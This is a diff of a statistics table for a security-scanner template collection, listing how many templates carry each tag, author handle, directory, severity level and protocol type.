-| webmodule-ee         |     1 |                                |       |                  |       |          |       |         |       |
-| api-manager          |     1 |                                |       |                  |       |          |       |         |       |
-| spectracom           |     1 |                                |       |                  |       |          |       |         |       |
-| webui                |     1 |                                |       |                  |       |          |       |         |       |
-| short.io             |     1 |                                |       |                  |       |          |       |         |       |
-| coinlayer            |     1 |                                |       |                  |       |          |       |         |       |
-| mappress             |     1 |                                |       |                  |       |          |       |         |       |
-| roundcube            |     1 |                                |       |                  |       |          |       |         |       |
-| blockfrost           |     1 |                                |       |                  |       |          |       |         |       |
-| rudloff              |     1 |                                |       |                  |       |          |       |         |       |
-| dotnet               |     1 |                                |       |                  |       |          |       |         |       |
-| ecosys               |     1 |                                |       |                  |       |          |       |         |       |
-| yopass               |     1 |                                |       |                  |       |          |       |         |       |
-| ecom                 |     1 |                                |       |                  |       |          |       |         |       |
-| nearby               |     1 |                                |       |                  |       |          |       |         |       |
-| threatq              |     1 |                                |       |                  |       |          |       |         |       |
-| sprintful            |     1 |                                |       |                  |       |          |       |         |       |
-| acsoft               |     1 |                                |       |                  |       |          |       |         |       |
-| wazuh                |     1 |                                |       |                  |       |          |       |         |       |
-| centreon             |     1 |                                |       |                  |       |          |       |         |       |
-| portal               |     1 |                                |       |                  |       |          |       |         |       |
-| imap                 |     1 |                                |       |                  |       |          |       |         |       |
-| wordcloud            |     1 |                                |       |                  |       |          |       |         |       |
-| aura                 |     1 |                                |       |                  |       |          |       |         |       |
-| blackboard           |     1 |                                |       |                  |       |          |       |         |       |
-| okiko                |     1 |                                |       |                  |       |          |       |         |       |
+|         TAG          | COUNT |               AUTHOR                | COUNT |    DIRECTORY     | COUNT | SEVERITY | COUNT |  TYPE   | COUNT |
+|----------------------|-------|-------------------------------------|-------|------------------|-------|----------|-------|---------|-------|
+| cve                  |  1430 | daffainfo                           |   631 | cves             |  1407 | info     |  1474 | http    |  3858 |
+| panel                |   655 | dhiyaneshdk                         |   584 | exposed-panels   |   662 | high     |  1009 | file    |    76 |
+| edb                  |   563 | pikpikcu                            |   329 | vulnerabilities  |   509 | medium   |   818 | network |    51 |
+| lfi                  |   509 | pdteam                              |   269 | technologies     |   282 | critical |   478 | dns     |    17 |
+| xss                  |   491 | geeknik                             |   187 | exposures        |   275 | low      |   225 |         |       |
+| wordpress            |   419 | dwisiswant0                         |   169 | misconfiguration |   237 | unknown  |    11 |         |       |
+| exposure             |   407 | 0x_akoko                            |   165 | token-spray      |   230 |          |       |         |       |
+| cve2021              |   352 | princechaddha                       |   151 | workflows        |   189 |          |       |         |       |
+| rce                  |   337 | ritikchaddha                        |   137 | default-logins   |   103 |          |       |         |       |
+| wp-plugin            |   316 | pussycat0x                          |   133 | file             |    76 |          |       |         |       |
+| tech                 |   295 | gy741                               |   126 | takeovers        |    68 |          |       |         |       |
+| packetstorm          |   276 | arafatansari                        |    79 | iot              |    39 |          |       |         |       |
+| token-spray          |   230 | madrobot                            |    65 | network          |    37 |          |       |         |       |
+| cve2020              |   214 | zzeitlin                            |    64 | cnvd             |    25 |          |       |         |       |
+| wpscan               |   212 | idealphase                          |    60 | miscellaneous    |    24 |          |       |         |       |
+|                      |   194 | akincibor                           |    46 | dns              |    17 |          |       |         |       |
+| cve2022              |   184 | gaurang                             |    42 | fuzzing          |    12 |          |       |         |       |
+| unauth               |   158 | for3stco1d                          |    38 | headless         |     7 |          |       |         |       |
+| config               |   147 | philippedelteil                     |    36 | ssl              |     5 |          |       |         |       |
+| cve2018              |   144 | adam crosser                        |    30 |                  |       |          |       |         |       |
+| kev                  |   141 | ice3man                             |    26 |                  |       |          |       |         |       |
+| cve2019              |   135 | c-sh0                               |    26 |                  |       |          |       |         |       |
+| wp                   |   134 | organiccrap                         |    24 |                  |       |          |       |         |       |
+| joomla               |   133 | ffffffff0x                          |    22 |                  |       |          |       |         |       |
+| apache               |   123 | righettod                           |    22 |                  |       |          |       |         |       |
+| default-login        |   118 | techbrunchfr                        |    21 |                  |       |          |       |         |       |
+| iot                  |   116 | cckuailong                          |    17 |                  |       |          |       |         |       |
+| oast                 |   112 | edoardottt                          |    17 |                  |       |          |       |         |       |
+| cve2010              |   111 | sheikhrishad                        |    15 |                  |       |          |       |         |       |
+| misconfig            |   107 | sullo                               |    15 |                  |       |          |       |         |       |
+| sqli                 |    95 | pr3r00t                             |    15 |                  |       |          |       |         |       |
+| authenticated        |    90 | milo2012                            |    14 |                  |       |          |       |         |       |
+| redirect             |    87 | r3dg33k                             |    14 |                  |       |          |       |         |       |
+| login                |    87 | 0ri2n                               |    13 |                  |       |          |       |         |       |
+| router               |    84 | sharath                             |    13 |                  |       |          |       |         |       |
+| takeover             |    74 | tenbird                             |    13 |                  |       |          |       |         |       |
+| token                |    72 | melbadry9                           |    12 |                  |       |          |       |         |       |
+| devops               |    71 | johnk3r                             |    12 |                  |       |          |       |         |       |
+| ssrf                 |    69 | suman_kar                           |    12 |                  |       |          |       |         |       |
+| cve2017              |    67 | dogasantos                          |    11 |                  |       |          |       |         |       |
+| file                 |    60 | wdahlenb                            |    11 |                  |       |          |       |         |       |
+| auth-bypass          |    59 | cyllective                          |    11 |                  |       |          |       |         |       |
+| oracle               |    57 | random-robbie                       |    11 |                  |       |          |       |         |       |
+| intrusive            |    56 | elsfa7110                           |    11 |                  |       |          |       |         |       |
+| cms                  |    55 | alph4byt3                           |    10 |                  |       |          |       |         |       |
+| network              |    55 | nadino                              |    10 |                  |       |          |       |         |       |
+| disclosure           |    53 | random_robbie                       |    10 |                  |       |          |       |         |       |
+| seclists             |    51 | tess                                |    10 |                  |       |          |       |         |       |
+| cve2016              |    48 | meme-lord                           |    10 |                  |       |          |       |         |       |
+| cisco                |    47 | hackergautam                        |    10 |                  |       |          |       |         |       |
+| google               |    46 | emadshanab                          |     9 |                  |       |          |       |         |       |
+| cve2015              |    46 | 0x240x23elu                         |     9 |                  |       |          |       |         |       |
+| fileupload           |    44 | oppsec                              |     9 |                  |       |          |       |         |       |
+| plugin               |    41 | aashiq                              |     8 |                  |       |          |       |         |       |
+| cve2014              |    41 | iamthefrogy                         |     8 |                  |       |          |       |         |       |
+| adobe                |    40 | zh                                  |     8 |                  |       |          |       |         |       |
+| oss                  |    39 | logicalhunter                       |     8 |                  |       |          |       |         |       |
+| vulhub               |    36 | that_juan_                          |     8 |                  |       |          |       |         |       |
+| logs                 |    36 | amit-jd                             |     7 |                  |       |          |       |         |       |
+| aem                  |    36 | harshbothra_                        |     7 |                  |       |          |       |         |       |
+| traversal            |    35 | randomstr1ng                        |     7 |                  |       |          |       |         |       |
+| vmware               |    35 | caspergn                            |     7 |                  |       |          |       |         |       |
+| atlassian            |    34 | divya_mudgal                        |     7 |                  |       |          |       |         |       |
+| tenable              |    33 | leovalcante                         |     7 |                  |       |          |       |         |       |
+| injection            |    33 | dr_set                              |     7 |                  |       |          |       |         |       |
+| listing              |    31 | techryptic (@tech)                  |     7 |                  |       |          |       |         |       |
+| hackerone            |    31 | kophjager007                        |     7 |                  |       |          |       |         |       |
+| jira                 |    31 | puzzlepeaches                       |     6 |                  |       |          |       |         |       |
+| generic              |    28 | praetorian-thendrickson             |     6 |                  |       |          |       |         |       |
+| springboot           |    28 | evan rubinstein                     |     6 |                  |       |          |       |         |       |
+| dns                  |    27 | iamnoooob                           |     6 |                  |       |          |       |         |       |
+| kubernetes           |    27 | nullfuzz                            |     6 |                  |       |          |       |         |       |
+| huntr                |    27 | forgedhallpass                      |     6 |                  |       |          |       |         |       |
+| log4j                |    25 | __fazal                             |     6 |                  |       |          |       |         |       |
+| sap                  |    25 | veshraj                             |     6 |                  |       |          |       |         |       |
+| cnvd                 |    25 | pentest_swissky                     |     6 |                  |       |          |       |         |       |
+| microsoft            |    23 | _0xf4n9x_                           |     6 |                  |       |          |       |         |       |
+| proxy                |    23 | rootxharsh                          |     6 |                  |       |          |       |         |       |
+| jndi                 |    22 | imnightmaree                        |     6 |                  |       |          |       |         |       |
+| debug                |    22 | pathtaga                            |     6 |                  |       |          |       |         |       |
+| manageengine         |    21 | panch0r3d                           |     5 |                  |       |          |       |         |       |
+| misc                 |    21 | podalirius                          |     5 |                  |       |          |       |         |       |
+| zoho                 |    21 | yanyun                              |     5 |                  |       |          |       |         |       |
+| wp-theme             |    21 | lu4nx                               |     5 |                  |       |          |       |         |       |
+| aws                  |    20 | joanbono                            |     5 |                  |       |          |       |         |       |
+| fuzz                 |    20 | ganofins                            |     5 |                  |       |          |       |         |       |
+| cve2012              |    20 | nodauf                              |     5 |                  |       |          |       |         |       |
+| weblogic             |    19 | xelkomy                             |     5 |                  |       |          |       |         |       |
+| tomcat               |    19 | dolev farhi                         |     4 |                  |       |          |       |         |       |
+| php                  |    19 | 3th1c_yuk1                          |     4 |                  |       |          |       |         |       |
+| deserialization      |    19 | r3naissance                         |     4 |                  |       |          |       |         |       |
+| dlink                |    18 | wisnupramoedya                      |     4 |                  |       |          |       |         |       |
+| k8s                  |    18 | dadevel                             |     4 |                  |       |          |       |         |       |
+| api                  |    18 | defr0ggy                            |     4 |                  |       |          |       |         |       |
+| ibm                  |    18 | scent2d                             |     4 |                  |       |          |       |         |       |
+| camera               |    18 | e_schultze_                         |     4 |                  |       |          |       |         |       |
+| service              |    18 | h1ei1                               |     4 |                  |       |          |       |         |       |
+| jenkins              |    17 | tanq16                              |     4 |                  |       |          |       |         |       |
+| wavlink              |    17 | incogbyte                           |     4 |                  |       |          |       |         |       |
+| cloud                |    17 | ph33r                               |     3 |                  |       |          |       |         |       |
+| cicd                 |    16 | dr0pd34d                            |     3 |                  |       |          |       |         |       |
+| struts               |    16 | mavericknerd                        |     3 |                  |       |          |       |         |       |
+| cve2009              |    15 | shine                               |     3 |                  |       |          |       |         |       |
+| xxe                  |    15 | andydoering                         |     3 |                  |       |          |       |         |       |
+| gitlab               |    15 | lark-lab                            |     3 |                  |       |          |       |         |       |
+| cve2011              |    15 | davidmckennirey                     |     3 |                  |       |          |       |         |       |
+| firewall             |    15 | arcc                                |     3 |                  |       |          |       |         |       |
+| printer              |    14 | johnjhacking                        |     3 |                  |       |          |       |         |       |
+| domainmod            |    14 | hahwul                              |     3 |                  |       |          |       |         |       |
+| hp                   |    14 | _generic_human_                     |     3 |                  |       |          |       |         |       |
+| android              |    14 | gitlab red team                     |     3 |                  |       |          |       |         |       |
+| java                 |    14 | impramodsargar                      |     3 |                  |       |          |       |         |       |
+| lfr                  |    13 | yash anand @yashanand155            |     3 |                  |       |          |       |         |       |
+| ruijie               |    13 | yuzhe-zhang-0                       |     3 |                  |       |          |       |         |       |
+| msf                  |    13 | alifathi-h1                         |     3 |                  |       |          |       |         |       |
+| abstractapi          |    13 | skeltavik                           |     3 |                  |       |          |       |         |       |
+| cve2013              |    13 | unstabl3                            |     3 |                  |       |          |       |         |       |
+| drupal               |    12 | shifacyclewala                      |     3 |                  |       |          |       |         |       |
+| ftp                  |    12 | f1tz                                |     3 |                  |       |          |       |         |       |
+| graphql              |    12 | binaryfigments                      |     3 |                  |       |          |       |         |       |
+| confluence           |    12 | splint3r7                           |     3 |                  |       |          |       |         |       |
+| nginx                |    12 | emenalf                             |     3 |                  |       |          |       |         |       |
+| netsweeper           |    12 | me9187                              |     3 |                  |       |          |       |         |       |
+| status               |    12 | thomas_from_offensity               |     3 |                  |       |          |       |         |       |
+| magento              |    12 | 0w4ys                               |     3 |                  |       |          |       |         |       |
+| rails                |    12 | its0x08                             |     3 |                  |       |          |       |         |       |
+| netgear              |    12 | powerexploit                        |     3 |                  |       |          |       |         |       |
+| woocommerce          |    11 | fyoorer                             |     3 |                  |       |          |       |         |       |
+| cve2008              |    11 | mr-xn                               |     3 |                  |       |          |       |         |       |
+| microweber           |    11 | sushantkamble                       |     3 |                  |       |          |       |         |       |
+| cisa                 |    11 | supras                              |     3 |                  |       |          |       |         |       |
+| backup               |    11 | dudez                               |     3 |                  |       |          |       |         |       |
+| airflow              |    11 | ekrause                             |     3 |                  |       |          |       |         |       |
+| glpi                 |    11 | atomiczsec                          |     3 |                  |       |          |       |         |       |
+| cnvd2021             |    11 | jarijaas                            |     3 |                  |       |          |       |         |       |
+| amazon               |    11 | lucasljm2001                        |     3 |                  |       |          |       |         |       |
+| azure                |    11 | z3bd                                |     3 |                  |       |          |       |         |       |
+| jolokia              |    10 | fxploit                             |     3 |                  |       |          |       |         |       |
+| github               |    10 | whoever                             |     3 |                  |       |          |       |         |       |
+| zyxel                |    10 | geekby                              |     2 |                  |       |          |       |         |       |
+| grafana              |    10 | joeldeleep                          |     2 |                  |       |          |       |         |       |
+| django               |    10 | afaq                                |     2 |                  |       |          |       |         |       |
+| fortigate            |    10 | z0ne                                |     2 |                  |       |          |       |         |       |
+| coldfusion           |    10 | kre80r                              |     2 |                  |       |          |       |         |       |
+| dell                 |    10 | bing0o                              |     2 |                  |       |          |       |         |       |
+| spring               |    10 | udit_thakkur                        |     2 |                  |       |          |       |         |       |
+| fortinet             |     9 | dheerajmadhukar                     |     2 |                  |       |          |       |         |       |
+| laravel              |     9 | 0xcrypto                            |     2 |                  |       |          |       |         |       |
+| webserver            |     9 | lotusdll                            |     2 |                  |       |          |       |         |       |
+| kube                 |     9 | socketz                             |     2 |                  |       |          |       |         |       |
+| ruby                 |     9 | 0xprial                             |     2 |                  |       |          |       |         |       |
+| auth                 |     9 | raesene                             |     2 |                  |       |          |       |         |       |
+| phpmyadmin           |     9 | cristi vlad (@cristivlad25)         |     2 |                  |       |          |       |         |       |
+| prometheus           |     9 | redteambrasil                       |     2 |                  |       |          |       |         |       |
+| windows              |     9 | manas_harsh                         |     2 |                  |       |          |       |         |       |
+| backdoor             |     9 | gal nagli                           |     2 |                  |       |          |       |         |       |
+| vcenter              |     9 | bananabr                            |     2 |                  |       |          |       |         |       |
+| iis                  |     9 | prajiteshsingh                      |     2 |                  |       |          |       |         |       |
+| fastjson             |     9 | smaranchand                         |     2 |                  |       |          |       |         |       |
+| mirai                |     9 | nvn1729                             |     2 |                  |       |          |       |         |       |
+| wso2                 |     9 | 0xrudra                             |     2 |                  |       |          |       |         |       |
+| zabbix               |     9 | foulenzer                           |     2 |                  |       |          |       |         |       |
+| dedecms              |     9 | nuk3s3c                             |     2 |                  |       |          |       |         |       |
+| config-audit         |     8 | codexlynx                           |     2 |                  |       |          |       |         |       |
+| blind                |     8 | cocxanh                             |     2 |                  |       |          |       |         |       |
+| ssti                 |     8 | 0xsmiley                            |     2 |                  |       |          |       |         |       |
+| citrix               |     8 | vavkamil                            |     2 |                  |       |          |       |         |       |
+| zimbra               |     8 | amsda                               |     2 |                  |       |          |       |         |       |
+| headless             |     8 | nkxxkn                              |     2 |                  |       |          |       |         |       |
+| audit                |     8 | y4er                                |     2 |                  |       |          |       |         |       |
+| vpn                  |     8 | mahendra purbia (mah3sec_)          |     2 |                  |       |          |       |         |       |
+| scada                |     8 | dbrwsky                             |     2 |                  |       |          |       |         |       |
+| git                  |     8 | 0xsapra                             |     2 |                  |       |          |       |         |       |
+| metadata             |     8 | x1m_martijn                         |     2 |                  |       |          |       |         |       |
+| jboss                |     8 | pxmme1337                           |     2 |                  |       |          |       |         |       |
+| kafka                |     8 | thezakman                           |     2 |                  |       |          |       |         |       |
+| solr                 |     8 | hackerarpan                         |     2 |                  |       |          |       |         |       |
+| ssl                  |     8 | cckuakilong                         |     2 |                  |       |          |       |         |       |
+| elasticsearch        |     8 | n-thumann                           |     2 |                  |       |          |       |         |       |
+| recon                |     8 | myztique                            |     2 |                  |       |          |       |         |       |
+| cisco-switch         |     8 | koti2                               |     2 |                  |       |          |       |         |       |
+| sonicwall            |     8 | israel comazzetto dos reis          |     2 |                  |       |          |       |         |       |
+| icewarp              |     7 | ambassify                           |     2 |                  |       |          |       |         |       |
+| firebase             |     7 | 0xnirvana                           |     2 |                  |       |          |       |         |       |
+| druid                |     7 | kiblyn11                            |     2 |                  |       |          |       |         |       |
+| symfony              |     7 | swissky                             |     2 |                  |       |          |       |         |       |
+| jetbrains            |     7 | thardt-praetorian                   |     2 |                  |       |          |       |         |       |
+| mail                 |     7 | danielmofer                         |     2 |                  |       |          |       |         |       |
+| docker               |     7 | badboycxcc                          |     2 |                  |       |          |       |         |       |
+| python               |     7 | r12w4n                              |     2 |                  |       |          |       |         |       |
+| bucket               |     7 | bp0lr                               |     2 |                  |       |          |       |         |       |
+| cnvd2020             |     7 | w4cky_                              |     2 |                  |       |          |       |         |       |
+| files                |     7 | ajaysenr                            |     2 |                  |       |          |       |         |       |
+| solarview            |     7 | luci                                |     2 |                  |       |          |       |         |       |
+| exchange             |     7 | g4l1t0                              |     2 |                  |       |          |       |         |       |
+| maps                 |     7 | bernardofsr                         |     2 |                  |       |          |       |         |       |
+| squirrelmail         |     7 | 0xelkomy                            |     2 |                  |       |          |       |         |       |
+| seeyon               |     6 | paperpen                            |     2 |                  |       |          |       |         |       |
+| emerge               |     6 | joshlarsen                          |     2 |                  |       |          |       |         |       |
+| setup                |     6 | bsysop                              |     2 |                  |       |          |       |         |       |
+| npm                  |     6 | ree4pwn                             |     2 |                  |       |          |       |         |       |
+| go                   |     6 | github.com/its0x08                  |     2 |                  |       |          |       |         |       |
+| vms                  |     6 | parth                               |     2 |                  |       |          |       |         |       |
+| zhiyuan              |     6 | taielab                             |     2 |                  |       |          |       |         |       |
+| sitecore             |     6 | zomsop82                            |     2 |                  |       |          |       |         |       |
+| liferay              |     6 | k11h-de                             |     2 |                  |       |          |       |         |       |
+| cobbler              |     6 | v0idc0de                            |     2 |                  |       |          |       |         |       |
+| bypass               |     6 | huowuzhao                           |     2 |                  |       |          |       |         |       |
+| ecology              |     6 | sy3omda                             |     2 |                  |       |          |       |         |       |
+| rconfig              |     6 | clarkvoss                           |     2 |                  |       |          |       |         |       |
+| bigip                |     6 | moritz nentwig                      |     2 |                  |       |          |       |         |       |
+| huawei               |     6 | hetroublemakr                       |     2 |                  |       |          |       |         |       |
+| slack                |     6 | randomrobbie                        |     2 |                  |       |          |       |         |       |
+| samsung              |     6 | ehsahil                             |     2 |                  |       |          |       |         |       |
+| websphere            |     6 | rafaelwdornelas                     |     2 |                  |       |          |       |         |       |
+| magmi                |     6 | uomogrande                          |     2 |                  |       |          |       |         |       |
+| enum                 |     6 | paradessia                          |     2 |                  |       |          |       |         |       |
+| jetty                |     6 | ricardo maia (brainfork)            |     2 |                  |       |          |       |         |       |
+| fpd                  |     6 | dahse89                             |     2 |                  |       |          |       |         |       |
+| artica               |     6 | 666asd                              |     2 |                  |       |          |       |         |       |
+| crlf                 |     6 | fabaff                              |     2 |                  |       |          |       |         |       |
+| nodejs               |     6 | sbani                               |     2 |                  |       |          |       |         |       |
+| kubelet              |     6 | martincodes-de                      |     2 |                  |       |          |       |         |       |
+| ofbiz                |     6 | gevakun                             |     2 |                  |       |          |       |         |       |
+| ognl                 |     6 | brenocss                            |     2 |                  |       |          |       |         |       |
+| lucee                |     6 | mohammedsaneem                      |     2 |                  |       |          |       |         |       |
+| ssh                  |     5 | convisoappsec                       |     2 |                  |       |          |       |         |       |
+| minio                |     5 | vsh00t                              |     2 |                  |       |          |       |         |       |
+| storage              |     5 | d4vy                                |     2 |                  |       |          |       |         |       |
+| fatpipe              |     5 | wabafet                             |     1 |                  |       |          |       |         |       |
+| strapi               |     5 | 0xh7ml                              |     1 |                  |       |          |       |         |       |
+| metinfo              |     5 | liquidsec                           |     1 |                  |       |          |       |         |       |
+| leak                 |     5 | push4d                              |     1 |                  |       |          |       |         |       |
+| firmware             |     5 | zsusac                              |     1 |                  |       |          |       |         |       |
+| opensis              |     5 | evan rubinstien                     |     1 |                  |       |          |       |         |       |
+| rfi                  |     5 | true13                              |     1 |                  |       |          |       |         |       |
+| error                |     5 | official_blackhat13                 |     1 |                  |       |          |       |         |       |
+| symantec             |     5 | tim_koopmans                        |     1 |                  |       |          |       |         |       |
+| rseenet              |     5 | noamrathaus                         |     1 |                  |       |          |       |         |       |
+| gogs                 |     5 | shifacyclewla                       |     1 |                  |       |          |       |         |       |
+| cache                |     5 | bernardo rodrigues                  |     1 |                  |       |          |       |         |       |
+|                      |       | @bernardofsr                        |       |                  |       |          |       |         |       |
+| avideo               |     5 | amnotacat                           |     1 |                  |       |          |       |         |       |
+| moodle               |     5 | izn0u                               |     1 |                  |       |          |       |         |       |
+| 74cms                |     5 | sickwell                            |     1 |                  |       |          |       |         |       |
+| alibaba              |     5 | jcockhren                           |     1 |                  |       |          |       |         |       |
+| apisix               |     5 | infosecsanyam                       |     1 |                  |       |          |       |         |       |
+| jamf                 |     5 | bjhulst                             |     1 |                  |       |          |       |         |       |
+| keycloak             |     5 | daviey                              |     1 |                  |       |          |       |         |       |
+| plesk                |     5 | becivells                           |     1 |                  |       |          |       |         |       |
+| thinkphp             |     5 | shreyapohekar                       |     1 |                  |       |          |       |         |       |
+| nagios               |     5 | arr0way                             |     1 |                  |       |          |       |         |       |
+| solarwinds           |     5 | kishore krishna (sillydaddy)        |     1 |                  |       |          |       |         |       |
+| cockpit              |     5 | yashanand155                        |     1 |                  |       |          |       |         |       |
+| gocd                 |     5 | mrcl0wnlab                          |     1 |                  |       |          |       |         |       |
+| circarlife           |     5 | brabbit10                           |     1 |                  |       |          |       |         |       |
+| node                 |     5 | knassar702                          |     1 |                  |       |          |       |         |       |
+| scan                 |     5 | jeya seelan                         |     1 |                  |       |          |       |         |       |
+| elfinder             |     5 | streetofhackerr007 (rohit           |     1 |                  |       |          |       |         |       |
+|                      |       | soni)                               |       |                  |       |          |       |         |       |
+| carrental            |     5 | maximus decimus                     |     1 |                  |       |          |       |         |       |
+| mongodb              |     4 | osamahamad                          |     1 |                  |       |          |       |         |       |
+| flink                |     4 | pry0cc                              |     1 |                  |       |          |       |         |       |
+| gnuboard             |     4 | b0yd                                |     1 |                  |       |          |       |         |       |
+| smtp                 |     4 | ratnadip gajbhiye                   |     1 |                  |       |          |       |         |       |
+| kibana               |     4 | j3ssie/geraldino2                   |     1 |                  |       |          |       |         |       |
+| voip                 |     4 | elmahdi                             |     1 |                  |       |          |       |         |       |
+| hoteldruid           |     4 | sicksec                             |     1 |                  |       |          |       |         |       |
+| mailchimp            |     4 | jbertman                            |     1 |                  |       |          |       |         |       |
+| resin                |     4 | twitter.com/dheerajmadhukar         |     1 |                  |       |          |       |         |       |
+| terramaster          |     4 | florianmaak                         |     1 |                  |       |          |       |         |       |
+| db                   |     4 | danigoland                          |     1 |                  |       |          |       |         |       |
+| search               |     4 | evolutionsec                        |     1 |                  |       |          |       |         |       |
+| telesquare           |     4 | ph33rr                              |     1 |                  |       |          |       |         |       |
+| oa                   |     4 | akshansh                            |     1 |                  |       |          |       |         |       |
+| hongdian             |     4 | kurohost                            |     1 |                  |       |          |       |         |       |
+| install              |     4 | justmumu                            |     1 |                  |       |          |       |         |       |
+| oauth                |     4 | retr02332                           |     1 |                  |       |          |       |         |       |
+| hikvision            |     4 | apt-mirror                          |     1 |                  |       |          |       |         |       |
+| horde                |     4 | hexcat                              |     1 |                  |       |          |       |         |       |
+| puppet               |     4 | ggranjus                            |     1 |                  |       |          |       |         |       |
+| adminer              |     4 | orpheus                             |     1 |                  |       |          |       |         |       |
+| sophos               |     4 | akash.c                             |     1 |                  |       |          |       |         |       |
+| stripe               |     4 | makyotox                            |     1 |                  |       |          |       |         |       |
+| hybris               |     4 | aaronchen0                          |     1 |                  |       |          |       |         |       |
+| microstrategy        |     4 | p-l-                                |     1 |                  |       |          |       |         |       |
+| elastic              |     4 | andirrahmani1                       |     1 |                  |       |          |       |         |       |
+| tikiwiki             |     4 | philippdelteil                      |     1 |                  |       |          |       |         |       |
+| redmine              |     4 | bartu utku sarp                     |     1 |                  |       |          |       |         |       |
+| openemr              |     4 | piyushchhiroliya                    |     1 |                  |       |          |       |         |       |
+| nexus                |     4 | act1on3                             |     1 |                  |       |          |       |         |       |
+| roxy                 |     4 | davidfegyver                        |     1 |                  |       |          |       |         |       |
+| royalevent           |     4 | natto97                             |     1 |                  |       |          |       |         |       |
+| springcloud          |     4 | ivo palazzolo (@palaziv)            |     1 |                  |       |          |       |         |       |
+| filemanager          |     4 | momen eldawakhly                    |     1 |                  |       |          |       |         |       |
+| artifactory          |     4 | ldionmarcil                         |     1 |                  |       |          |       |         |       |
+| yeswiki              |     4 | jas37                               |     1 |                  |       |          |       |         |       |
+| sangfor              |     4 | mhdsamx                             |     1 |                  |       |          |       |         |       |
+| phppgadmin           |     4 | vzamanillo                          |     1 |                  |       |          |       |         |       |
+| prestashop           |     4 | adrianmf                            |     1 |                  |       |          |       |         |       |
+| vbulletin            |     4 | th3.d1p4k                           |     1 |                  |       |          |       |         |       |
+| xmlrpc               |     4 | ola456                              |     1 |                  |       |          |       |         |       |
+| ems                  |     4 | elder tao                           |     1 |                  |       |          |       |         |       |
+| couchdb              |     4 | clment cruchet                      |     1 |                  |       |          |       |         |       |
+| caucho               |     4 | furkansayim                         |     1 |                  |       |          |       |         |       |
+| beyondtrust          |     4 | 1nf1n7y                             |     1 |                  |       |          |       |         |       |
+| telerik              |     4 | iampritam                           |     1 |                  |       |          |       |         |       |
+| wcs                  |     4 | blckraven                           |     1 |                  |       |          |       |         |       |
+| aspose               |     4 | luqman                              |     1 |                  |       |          |       |         |       |
+| cve2007              |     4 | 0xd0ff9                             |     1 |                  |       |          |       |         |       |
+| postmessage          |     4 | screamy                             |     1 |                  |       |          |       |         |       |
+| asp                  |     4 | bernardo rodrigues                  |     1 |                  |       |          |       |         |       |
+|                      |       | @bernardofsr | andré monteiro       |       |                  |       |          |       |         |       |
+|                      |       | @am0nt31r0                          |       |                  |       |          |       |         |       |
+| phpinfo              |     4 | whynotke                            |     1 |                  |       |          |       |         |       |
+| hashicorp            |     4 | hakimkt                             |     1 |                  |       |          |       |         |       |
+| sonarqube            |     4 | b4uh0lz                             |     1 |                  |       |          |       |         |       |
+| activemq             |     4 | sshell                              |     1 |                  |       |          |       |         |       |
+| vrealize             |     4 | unkl4b                              |     1 |                  |       |          |       |         |       |
+| parallels            |     4 | udyz                                |     1 |                  |       |          |       |         |       |
+| awstats              |     4 | rubina119                           |     1 |                  |       |          |       |         |       |
+| jellyfin             |     4 | husain                              |     1 |                  |       |          |       |         |       |
+| sql                  |     4 | deena                               |     1 |                  |       |          |       |         |       |
+| cnvd2019             |     4 | yashgoti                            |     1 |                  |       |          |       |         |       |
+| kevinlab             |     4 | lark lab                            |     1 |                  |       |          |       |         |       |
+| cacti                |     4 | miryangjung                         |     1 |                  |       |          |       |         |       |
+| redis                |     4 | iphantasmic                         |     1 |                  |       |          |       |         |       |
+| hpe                  |     4 | ahmed sherif                        |     1 |                  |       |          |       |         |       |
+| photo                |     4 | kr1shna4garwal                      |     1 |                  |       |          |       |         |       |
+| thinkcmf             |     4 | luqmaan hadia                       |     1 |                  |       |          |       |         |       |
+|                      |       | [luqiih](https://github.com/luqiih) |       |                  |       |          |       |         |       |
+| database             |     4 | zhenwarx                            |     1 |                  |       |          |       |         |       |
+| panos                |     4 | droberson                           |     1 |                  |       |          |       |         |       |
+| paypal               |     4 | rschio                              |     1 |                  |       |          |       |         |       |
+| consul               |     3 | amanrawat                           |     1 |                  |       |          |       |         |       |
+| exposures            |     3 | kba@sogeti_esec                     |     1 |                  |       |          |       |         |       |
+| fileman              |     3 | xshuden                             |     1 |                  |       |          |       |         |       |
+| goanywhere           |     3 | alevsk                              |     1 |                  |       |          |       |         |       |
+| ivanti               |     3 | kailashbohara                       |     1 |                  |       |          |       |         |       |
+| dom                  |     3 | undefl0w                            |     1 |                  |       |          |       |         |       |
+| dolibarr             |     3 | aaron_costello                      |     1 |                  |       |          |       |         |       |
+|                      |       | (@conspiracyproof)                  |       |                  |       |          |       |         |       |
+| openam               |     3 | w0tx                                |     1 |                  |       |          |       |         |       |
+| nacos                |     3 | opencirt                            |     1 |                  |       |          |       |         |       |
+| targa                |     3 | 2rs3c                               |     1 |                  |       |          |       |         |       |
+| servicenow           |     3 | shelld3v                            |     1 |                  |       |          |       |         |       |
+| geoserver            |     3 | mesaglio                            |     1 |                  |       |          |       |         |       |
+| matrix               |     3 | higor melgaço (eremit4)             |     1 |                  |       |          |       |         |       |
+| finecms              |     3 | ok_bye_now                          |     1 |                  |       |          |       |         |       |
+| octobercms           |     3 | b0rn2r00t                           |     1 |                  |       |          |       |         |       |
+| wordfence            |     3 | dawid-czarnecki                     |     1 |                  |       |          |       |         |       |
+| actuator             |     3 | manasmbellani                       |     1 |                  |       |          |       |         |       |
+| mcafee               |     3 | regala_                             |     1 |                  |       |          |       |         |       |
+| smb                  |     3 | manuelbua                           |     1 |                  |       |          |       |         |       |
+| openbmcs             |     3 | thebinitghimire                     |     1 |                  |       |          |       |         |       |
+| jupyter              |     3 | s1r1u5_                             |     1 |                  |       |          |       |         |       |
+| umbraco              |     3 | hardik-rathod                       |     1 |                  |       |          |       |         |       |
+| webmail              |     3 | patralos                            |     1 |                  |       |          |       |         |       |
+| panabit              |     3 | ringo                               |     1 |                  |       |          |       |         |       |
+| splunk               |     3 | tea                                 |     1 |                  |       |          |       |         |       |
+| glassfish            |     3 | ling                                |     1 |                  |       |          |       |         |       |
+| ec2                  |     3 | httpvoid                            |     1 |                  |       |          |       |         |       |
+| grav                 |     3 | nobody                              |     1 |                  |       |          |       |         |       |
+| thinfinity           |     3 | streetofhackerr007                  |     1 |                  |       |          |       |         |       |
+| subrion              |     3 | rodnt                               |     1 |                  |       |          |       |         |       |
+| dzzoffice            |     3 | harshinsecurity                     |     1 |                  |       |          |       |         |       |
+| voipmonitor          |     3 | alperenkesk                         |     1 |                  |       |          |       |         |       |
+| messaging            |     3 | lixts                               |     1 |                  |       |          |       |         |       |
+| jfrog                |     3 | open-sec                            |     1 |                  |       |          |       |         |       |
